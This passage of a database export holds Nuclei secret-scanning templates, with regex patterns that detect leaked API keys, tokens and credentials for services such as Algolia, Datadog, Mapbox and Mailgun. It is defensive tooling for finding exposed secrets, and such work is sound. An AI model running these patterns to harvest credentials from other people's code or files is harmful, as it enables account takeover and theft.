\"(?i)[\\\"']?algolia[_-]?search[_-]?key[_-]?1[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?algolia[_-]?search[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?algolia[_-]?search[_-]?api[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?algolia[_-]?api[_-]?key[_-]?search[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?algolia[_-]?api[_-]?key[_-]?mcm[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?algolia[_-]?api[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?algolia[_-]?admin[_-]?key[_-]?mcm[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?algolia[_-]?admin[_-]?key[_-]?2[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?algolia[_-]?admin[_-]?key[_-]?1[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?air[-_]?table[-_]?api[-_]?key[\\\"']?[=:][\\\"']?.+[\\\"']\"\n - \"(?i)[\\\"']?adzerk[_-]?api[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?admin[_-]?email[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?account[_-]?sid[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?access[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?access[_-]?secret[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?access[_-]?key[_-]?secret[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)(([a-z0-9]+)[-|_])?(key|password|passwd|pass|pwd|private|credential|auth|cred|creds|secret|access|token)([-|_][a-z]+)?(\\\\s)*(:|=)+\"\n\n# Enhanced by md on 2023/05/04\n# digest: 4a0a00473045022100b72b69d337c25863bb7f860b4a6811ae2eefe0dd86e750fec9e74e84acbe9f61022035683b418d60d3eadb52eafc6261e03e9eb0e08e2c6f0f3d51bf38f43da64e66:922c64590222798bb761d5b6d8e72950\n", "hash": "9bbe9d87c73ca7ff71165ab9f7849cfc", "level": 1, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307cdb" }, "name": "credentials.yaml", "content": "id: basic-auth-creds\n\ninfo:\n name: Basic Authorization Credentials Check\n author: gaurang\n severity: high\n description: Basic authorization credentials check was conducted.\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cwe-id: CWE-200\n tags: file,keys,token,auth\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n regex:\n - \"[a-zA-Z]{3,10}://[^/\\\\s:@]{3,20}:[^/\\\\s:@]{3,20}@.{1,100}[\\\"'\\\\s]\"\n\n# Enhanced by md on 2023/05/04\n# digest: 4a0a0047304502202df27d9178759221ccfd4f42d805760dde03a437cdc608ec1f4f2db3eb89ecde022100d7db05435aaea98edaf4c7bf280ba2d6f0705d6241b5cf95a5502da2d507f8a2:922c64590222798bb761d5b6d8e72950", "hash": "2b96c5f25aa4bfc3442efe31f1c85e1c", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307cdc" }, "name": "databricks-api-token.yaml", "content": "id: databricks-api-token\n\ninfo:\n name: Databricks API Token\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/databricks-api-token.yaml\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/databricks-api-token.go\n metadata:\n verified: true\n tags: file,keys,databricks,token\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - (?i)\\b(dapi[a-h0-9]{32})(?:['|\\\"|\\n|\\r|\\s|\\x60|;]|$)\n# digest: 4b0a00483046022100d6d700b349ee1fb96e6cd411540efe63b8889339763cbb99e050c5f818336a55022100e87d0bfb5914fdd8aeabf876d62b8cabd4ceefd2150d4f5b51fea00e13847dc6:922c64590222798bb761d5b6d8e72950", "hash": "715c1e9fc373ccab44aa8f61f818c78d", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307cdd" }, "name": "datadog-access-token.yaml", "content": "id: datadog-access-token\n\ninfo:\n name: Datadog Access Token\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/datadog-access-token.yaml\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/datadog-access-token.go\n metadata:\n verified: true\n tags: keys,file,datadog,token\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - (?i)(?:datadog)(?:[0-9a-z\\-_\\t .]{0,20})(?:[\\s|']|[\\s|\"]){0,3}(?:=|>|:=|\\|\\|:|<=|=>|:)(?:'|\\\"|\\s|=|\\x60){0,5}([a-z0-9]{40})(?:['|\\\"|\\n|\\r|\\s|\\x60|;]|$)\n# digest: 4b0a00483046022100934a76ae8d3357dca6e4451871e708a0b644e72c823623aa11e4b212b5df92d5022100df2cce06f252dc3bd0cd517ca757cf1569d1c306f51776bdf2503fe71bc9e20e:922c64590222798bb761d5b6d8e72950", "hash": "1398cfc67a64076a30b8afbd9aa0e09c", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307cde" }, "name": "doppler-api-token.yaml", "content": "id: doppler-api-token\n\ninfo:\n name: Doppler API Token\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/doppler-api-token.yaml\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/doppler-api-token.go\n metadata:\n verified: true\n tags: file,keys,doppler,token\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - (dp\\.pt\\.)(?i)[a-z0-9]{43}\n# digest: 4a0a00473045022100dc52d6b1fb23bf2c2c3c8d4d9e916c690983e2be8fab56fad96025202a66d37902200c8b8f6a353d9f716725c24c0de34f2ef15e0b3a7be7bb55442053a6f610daa2:922c64590222798bb761d5b6d8e72950", "hash": "1ebc194e8967bda12c6092b713f86187", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307cdf" }, "name": "droneci-access-token.yaml", "content": "id: droneci-access-token\n\ninfo:\n name: Droneci Access Token\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/droneci-access-token.yaml\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/droneci-access-token.go\n metadata:\n verified: true\n tags: file,keys,droneci,token\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - (?i)(?:droneci)(?:[0-9a-z\\-_\\t .]{0,20})(?:[\\s|']|[\\s|\"]){0,3}(?:=|>|:=|\\|\\|:|<=|=>|:)(?:'|\\\"|\\s|=|\\x60){0,5}([a-z0-9]{32})(?:['|\\\"|\\n|\\r|\\s|\\x60|;]|$)\n# digest: 4b0a00483046022100b8f035e2f690ff06f1064c2fad434ef3faf43af1d86770b66ad77ecd44b93910022100fcf85bc0bcc2f473500998a866956b53f21d72f6325c80dbf3f758f0009614a2:922c64590222798bb761d5b6d8e72950", "hash": "fd98d1ae4c24f0f8debb5ccff7bf6e5d", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ce0" }, "name": "duffel-api-token.yaml", "content": "id: duffel-api-token\n\ninfo:\n name: Duffel API Token\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/duffel-api-token.yaml\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/duffel-api-token.go\n metadata:\n verified: true\n tags: keys,file,duffel,token\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - duffel_(test|live)_(?i)[a-z0-9_\\-=]{43}\n# digest: 4a0a0047304502202421c143203a023a8285876328e3581df769889a541d51b3bdcf72ab8fc117ff022100cb6b572f959e94b842ee120dd67fb14cafc499e3b4b6d4665dd07eb3e53b60f3:922c64590222798bb761d5b6d8e72950", "hash": "5093c78368b4b33e41dd432feefecad0", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ce1" }, "name": "dynatrace-token.yaml", "content": "id: dynatrace-token\n\ninfo:\n name: Dynatrace Token - Detect\n author: gaurang\n severity: high\n description: Dynatrace token was detected.\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cwe-id: CWE-200\n tags: file,keys,token\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n regex:\n - \"dt0[a-zA-Z]{1}[0-9]{2}\\\\.[A-Z0-9]{24}\\\\.[A-Z0-9]{64}\"\n\n# Enhanced by md on 2023/05/04\n# digest: 4a0a00473045022100ab64299fac317f6ebc2349e91b5e7fb30e50b5c612e13c00d561ee816089222602207a3b30fbfc67583401a9e652198a3dc609e1877e0f5451748c91df5ac5a1fffa:922c64590222798bb761d5b6d8e72950", "hash": "c3538027ddb46746b03a0c6fce79eb76", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ce2" }, "name": "etsy-access-token.yaml", "content": "id: etsy-access-token\n\ninfo:\n name: Etsy Access Token\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/etsy-access-token.yaml\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/etsy-access-token.go\n metadata:\n verified: true\n tags: file,keys,etsy,token\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - (?i)(?:etsy)(?:[0-9a-z\\-_\\t .]{0,20})(?:[\\s|']|[\\s|\"]){0,3}(?:=|>|:=|\\|\\|:|<=|=>|:)(?:'|\\\"|\\s|=|\\x60){0,5}([a-z0-9]{24})(?:['|\\\"|\\n|\\r|\\s|\\x60|;]|$)\n# digest: 4a0a00473045022060ce8a53571f37202449c1685892f383465c312d2048578d5a202817d0611dfe022100e934a548eea41ac9818e3efffe2c9da795a395f884d4a1f10c0392de726fcf15:922c64590222798bb761d5b6d8e72950", "hash": "6ae91b7168b61cbe96749cf4aff9089a", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ce3" }, "name": "fastly-api-token.yaml", "content": "id: fastly-api-token\n\ninfo:\n name: Fastly API Token\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/fastly-api-token.yaml\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/fastly-api-token.go\n metadata:\n verified: true\n tags: keys,file,fastly,token\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - (?i)(?:fastly)(?:[0-9a-z\\-_\\t .]{0,20})(?:[\\s|']|[\\s|\"]){0,3}(?:=|>|:=|\\|\\|:|<=|=>|:)(?:'|\\\"|\\s|=|\\x60){0,5}([a-z0-9=_\\-]{32})(?:['|\\\"|\\n|\\r|\\s|\\x60|;]|$)\n# digest: 4b0a00483046022100d8441e43f35e1384e748abac2ddc93f5e90a14d06b06fb6f76e4762dcbe29ea602210095180944d4b581d9d4ee114b75f3ee2d820269c52e7da2d4d8a105f3e245a0ba:922c64590222798bb761d5b6d8e72950", "hash": "583dcea5f64384203c77afedcedbda78", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ce4" }, "name": "fcm-api-key.yaml", "content": "id: fcm-api-key\n\ninfo:\n name: Firebase Cloud Messaging Token\n author: Devang-Solanki\n severity: medium\n tags: file,keys,token,fcm,firebase,google\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n regex:\n - '[A-Za-z0-9-_]+:APA91b[A-Za-z0-9-_#]+'\n# digest: 4a0a00473045022041f056406b85bb039bce810b2835a5ab8a446a6b6dfac1a5656b0ff7bff221f2022100b130f489cf048057110e68b3a5d891878db9a6bc0d486eb07842a6f37510479a:922c64590222798bb761d5b6d8e72950", "hash": "d13e07762f7e8bb2f6f129e2077e5805", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ce5" }, "name": "figma-access-token.yaml", "content": "id: figma-access-token\n\ninfo:\n name: Figma Personal Access Token\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/praetorian-inc/noseyparker/blob/main/crates/noseyparker/data/default/rules/figma.yml\n - https://www.figma.com/developers/api\n metadata:\n verified: true\n tags: file,keys,figma,token\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - (?i)figma.{0,20}\\b([0-9a-f]{4}-[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12})\\b\n# digest: 4a0a00473045022100cbc7b923b9821d8b0da62a6152e2c9887062352d3f428e626da0e38bd455b6fe02201a9d7e25bc38f63682229f636ca9733c20b8de5e05453cd9ef09cda9f87186f8:922c64590222798bb761d5b6d8e72950", "hash": "b30fc24febed8b4b6dbb9f7243a85fb2", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ce6" }, "name": "finnhub-access-token.yaml", "content": "id: finnhub-access-token\n\ninfo:\n name: Finnhub Access Token\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/finnhub-access-token.yaml\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/finnhub-access-token.go\n metadata:\n verified: true\n tags: file,keys,finnhub,token\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - (?i)(?:finnhub)(?:[0-9a-z\\-_\\t .]{0,20})(?:[\\s|']|[\\s|\"]){0,3}(?:=|>|:=|\\|\\|:|<=|=>|:)(?:'|\\\"|\\s|=|\\x60){0,5}([a-z0-9]{20})(?:['|\\\"|\\n|\\r|\\s|\\x60|;]|$)\n# digest: 4a0a00473045022100b50377388b15123b007f295e2b22c113fbbf59ec497c11f8245addf21da0d8a402200d62fc352af0319cc578ce82baed797de40b401a4885bd1abd5351225f01e68f:922c64590222798bb761d5b6d8e72950", "hash": "e8dc637b134803ab4cf1b2dda9ad89a3", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ce7" }, "name": "firebase-database.yaml", "content": "id: firebase-database\n\ninfo:\n name: Firebase Database Detect\n author: gaurang\n severity: info\n tags: file,keys,token,firebase\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n regex:\n - \"[a-z0-9.-]+\\\\.firebaseio\\\\.com\"\n - \"[a-z0-9.-]+\\\\.firebaseapp\\\\.com\"\n# digest: 490a004630440220035a4d1d44e47b7b20a0944a2cfe2939806e33f5341fa5ccf188db65d7aa8e0802203d0226609d88e9be2f2c31212b32ec0a6785a3855820655cb94c95fa66f738a0:922c64590222798bb761d5b6d8e72950", "hash": "16b499279b746d542b177aae351fb9c7", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ce8" }, "name": "flickr-access-token.yaml", "content": "id: flickr-access-token\n\ninfo:\n name: Flickr Access Token\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/flickr-access-token.yaml\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/flickr-access-token.go\n metadata:\n verified: true\n tags: flickr,file,keys\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - (?i)(?:flickr)(?:[0-9a-z\\-_\\t .]{0,20})(?:[\\s|']|[\\s|\"]){0,3}(?:=|>|:=|\\|\\|:|<=|=>|:)(?:'|\\\"|\\s|=|\\x60){0,5}([a-z0-9]{32})(?:['|\\\"|\\n|\\r|\\s|\\x60|;]|$)\n\n# digest: 4a0a00473045022100e34de1ee37b96835acda1132433eec7c4b02c2a35b1139ae4b8e5aaa38e85e5e0220612e97d89129b040693343da576a8d7eee35944a3769c76dd269f5602e0d02db:922c64590222798bb761d5b6d8e72950\n", "hash": "47d66a27eabf9f6680a1990fcb2c1264", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ce9" }, "name": "frameio-api-token.yaml", "content": "id: frameio-api-token\n\ninfo:\n name: Frameio API Token\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/frameio-api-token.yaml\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/frameio-api-token.go\n metadata:\n verified: true\n tags: frameio,file,keys\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - fio-u-(?i)[a-z0-9\\-_=]{64}\n\n# digest: 4a0a0047304502200c5a4dfba3c1a826c28c745bd3debafd32fa105a12cd37a5c018300440233ad8022100836571fe9c99297bbbcd639faaac0f0b856d4a6049e8fcc201537c5068d7ac57:922c64590222798bb761d5b6d8e72950\n", "hash": "16e684c08b8098a74a8ec09e05114de5", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307cea" }, "name": "freshbooks-access-token.yaml", "content": "id: freshbooks-access-token\n\ninfo:\n name: Freshbooks Access Token\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/freshbooks-access-token.yaml\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/freshbooks-access-token.go\n metadata:\n verified: true\n tags: freshbooks,file,keys\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - fio-u-(?i)[a-z0-9\\-_=]{64}\n\n# digest: 490a004630440220373919559ed5f79b42f4628fe2e75f9de9582f7447fdd43a711fe32f13993ece02207d990413ca61229e70e14b9d17990afbec9396475b33ba44faf734c9e4e27c16:922c64590222798bb761d5b6d8e72950\n", "hash": "7af0c969b827f01081514d83dc2d67de", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ceb" }, "name": "gcp-service-account.yaml", "content": "id: gcp-service-account\n\ninfo:\n name: Google (GCP) Service-account\n author: gaurang\n severity: low\n tags: file,keys,token,google\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n regex:\n - \"\\\"type\\\": \\\"service_account\\\"\"\n# digest: 4a0a00473045022100cb6dcfa7dcc1544a9d22b921bfe6ea06c853f81c2dba5230df89bb222cded8390220220342a2699d75a6104f3af08f65b6bc97b873889fadf53fb7214b9b712dd5f2:922c64590222798bb761d5b6d8e72950", "hash": "675ea01bbc90275b01bb3c95f5018075", "level": 3, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307cec" }, "name": "gitter-access-token.yaml", "content": "id: gitter-access-token\n\ninfo:\n name: Gitter Access Token\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/gitter-access-token.yaml\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/gitter-access-token.go\n metadata:\n verified: true\n tags: gitter,file,keys\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - (?i)(?:gitter)(?:[0-9a-z\\-_\\t .]{0,20})(?:[\\s|']|[\\s|\"]){0,3}(?:=|>|:=|\\|\\|:|<=|=>|:)(?:'|\\\"|\\s|=|\\x60){0,5}([a-z0-9_-]{40})(?:['|\\\"|\\n|\\r|\\s|\\x60|;]|$)\n\n# digest: 4a0a00473045022024b31fc9eb1fabba2e0853bff3057754737098dce170f37dae5b48e451e37adf022100cadc0986bb67a10f42b716e69921383c00f6e61fdc87f2bfded8780288c024c5:922c64590222798bb761d5b6d8e72950\n", "hash": "7f01e144536d3f93b07f8002ac90ad45", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ced" }, "name": "gocardless-api-token.yaml", "content": "id: gocardless-api-token\n\ninfo:\n name: Gocardless API Token\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/gocardless-api-token.yaml\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/gocardless-api-token.go\n metadata:\n verified: true\n tags: gocardless,file,keys\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - (?i)(?:gocardless)(?:[0-9a-z\\-_\\t .]{0,20})(?:[\\s|']|[\\s|\"]){0,3}(?:=|>|:=|\\|\\|:|<=|=>|:)(?:'|\\\"|\\s|=|\\x60){0,5}(live_(?i)[a-z0-9\\-_=]{40})(?:['|\\\"|\\n|\\r|\\s|\\x60|;]|$)\n\n# digest: 490a004630440220155e107b0ad06304b29f2c77174e43f1a746c7a1919c6db1b92f8cdfdd9fde4702203b452239f0686864410852dc04f7f1f2ab9605ce5fd6f625f2f2a92d5c4bfe64:922c64590222798bb761d5b6d8e72950\n", "hash": "4993e24b5e133b92cb54922ccd5a9778", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307cee" }, "name": "hashicorp-api-token.yaml", "content": "id: hashicorp-api-token\n\ninfo:\n name: Hashicorp API Token\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/hashicorp-tf-api-token.yaml\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/hashicorp-tf-api-token.go\n metadata:\n verified: true\n tags: hashicorp,file,keys\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - (?i)[a-z0-9]{14}\\.atlasv1\\.[a-z0-9\\-_=]{60,70}\n\n# digest: 490a004630440220077946f13881a3f72dcf81af66d6441c54bcfa9ebf55bb2a9b9b8e16ca48f82c022071b09b7aa278782ba81b70d8da7eed2b6876da0e551fc1a23533e1d67f4cce02:922c64590222798bb761d5b6d8e72950\n", "hash": "d72f9ec4fbd43520fd824107b052e06d", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307cef" }, "name": "heroku-key.yaml", "content": "id: heroku-key\n\ninfo:\n name: Heroku API Key\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/praetorian-inc/noseyparker/blob/main/data/default/rules/heroku.yml\n - https://devcenter.heroku.com/articles/authentication\n metadata:\n verified: true\n tags: file,keys,heroku,token\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - '(?i)heroku.{0,20}key.{0,20}\\b([0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12})\\b'\n# digest: 4a0a00473045022100e9a5fe2b9b5307955ba8c070625b450f87018040278cac9d857936ad0a3b43fc022030fdf2d770b0a7de20c15055be3d5c8cde50df6937d8ebf01072ac9f83b9f461:922c64590222798bb761d5b6d8e72950", "hash": "c2abcd8908664cff885b644bc96ac8d4", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307cf0" }, "name": "jenkins-token.yaml", "content": "id: jenkins-token\n\ninfo:\n name: Jenkins Token or Crumb\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/praetorian-inc/noseyparker/blob/main/data/default/rules/jenkins.yml\n - https://www.jenkins.io/blog/2018/07/02/new-api-token-system/\n - https://www.jenkins.io/doc/book/security/csrf-protection/\n metadata:\n verified: true\n tags: file,keys,jenkins,crumb,token\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - '(?i)jenkins.{0,10}(?:crumb)?.{0,10}\\b([0-9a-f]{32,36})\\b'\n# digest: 4b0a00483046022100bbae117ce6e36c2edabf974fd82254d93119455c3ffaae610bba874bb154fd14022100c94a0e7d792202691a4e8608e7cefcf2bcd0323c9b4c9dacb555345000ec4b0b:922c64590222798bb761d5b6d8e72950", "hash": "7cdc0159cc500c2321ad57a0857dfab8", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307cf1" }, "name": "linkedin-id.yaml", "content": "id: linkedin-id\n\ninfo:\n name: Linkedin Client ID\n author: gaurang\n severity: low\n tags: file,keys,token,linkedin\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n regex:\n - \"(?i)linkedin(.{0,20})?(?-i)[0-9a-z]{12}\"\n# digest: 4a0a0047304502203d8afe36515a2055a46a90e36140bedad012308b2ee65ab71a018d3ebd0d502d022100e1ed5b6faf198657fe22358330ac6eb9dfbc042875faafbef04b8fa083eeecf9:922c64590222798bb761d5b6d8e72950", "hash": "30b160f9388b14e88932d3de8b2c4f2e", "level": 3, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307cf2" }, "name": "mailchimp-api.yaml", "content": "id: mailchimp-api-key\n\ninfo:\n name: Mailchimp API Key\n author: gaurang\n severity: high\n tags: keys,file,token,mailchimp\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n regex:\n - \"[0-9a-f]{32}-us[0-9]{1,2}\"\n# digest: 4a0a00473045022100b7d7dc7f716b2b6aa9f8fc0e8f2455cd4598868f7cdf43257e6359058f2bb4ab02201b98b540e564948f56babb33b53688a32a426e54dc32d0ca159d70eebb798191:922c64590222798bb761d5b6d8e72950", "hash": "baaaac0f7e353a7b4c9cd079ff87e8c9", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307cf3" }, "name": "mailgun-api.yaml", "content": "id: mailgun-api-key\n\ninfo:\n name: Mailgun API Key\n author: gaurang\n severity: high\n tags: file,keys,token,mailgun\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n regex:\n - \"key-[0-9a-zA-Z]{32}\"\n# digest: 4a0a00473045022006098cd86f41bfb24a9c4c7c6bfc1a855c71c69e8b834739e5ffc4567261266c022100bd407109d7d54367361ebda630747d01a6ba308679d3f50a1654629aa9da4873:922c64590222798bb761d5b6d8e72950", "hash": "b9a2a8345cb43406f2017662ad3e18e6", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307cf4" }, "name": "mapbox-token.yaml", "content": "id: mapbox-token\n\ninfo:\n name: Mapbox Token\n author: Devang-Solanki\n severity: medium\n reference:\n - https://docs.gitguardian.com/secrets-detection/detectors/specifics/mapbox_token\n - https://github.com/zricethezav/gitleaks/blob/master/cmd/generate/config/rules/mapbox.go\n metadata:\n verified: true\n tags: file,keys,token,mapbox\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n name: mapbox-public-token\n part: body\n regex:\n - 'pk\\.eyJ1Ijoi\\w+\\.[\\w-]*'\n\n - type: regex\n name: mapbox-secret-token\n part: body\n regex:\n - 'sk\\.eyJ1Ijoi\\w+\\.[\\w-]*'\n# digest: 4a0a00473045022100a7ea48306be5c2b2cfc395952e068bd2e299957868b11ba57c2c45fa49ff188502201ba10a29d5332a82ed0fa1c984668ce2df5e2213391127664a2eef6a04a299a9:922c64590222798bb761d5b6d8e72950", "hash": "8d50cf43d6471cc5071d0fc68ddd0e45", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307cf5" }, "name": "npm-accesstoken.yaml", "content": "id: npm-accesstoken\n\ninfo:\n name: NPM Access Token (fine-grained)\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/praetorian-inc/noseyparker/blob/main/data/default/rules/npm.yml\n - https://docs.npmjs.com/about-access-tokens\n - 